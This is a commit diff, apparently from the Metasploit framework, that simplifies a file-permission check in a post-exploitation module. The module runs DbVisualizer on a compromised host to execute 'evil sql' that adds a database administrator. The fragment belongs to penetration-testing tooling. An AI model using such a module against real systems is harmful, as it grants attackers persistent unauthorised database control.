Update dbvis_add_db_admin.rb
parent
c3b87e2e6c
commit
5f38ad5e10
|
@ -198,14 +198,7 @@ class Metasploit3 < Msf::Post
|
||||||
if file?(dbvis)==true
|
if file?(dbvis)==true
|
||||||
can_exec = false
|
can_exec = false
|
||||||
f = session.fs.file.stat(dbvis)
|
f = session.fs.file.stat(dbvis)
|
||||||
if f.uid == Process.euid
|
if f.uid == Process.euid or Process.groups.include?f.gid
|
||||||
can_exec = true
|
|
||||||
else
|
|
||||||
if Process.groups.include?f.gid
|
|
||||||
can_exec = true
|
|
||||||
end
|
|
||||||
end
|
|
||||||
if can_exec == true
|
|
||||||
print_status("Trying to execute evil sql, it can take time ...")
|
print_status("Trying to execute evil sql, it can take time ...")
|
||||||
args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
|
args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
|
||||||
dbvis ="\"#{dbvis}\""
|
dbvis ="\"#{dbvis}\""
|
||||||
|
|
Loading…
Reference in New Issue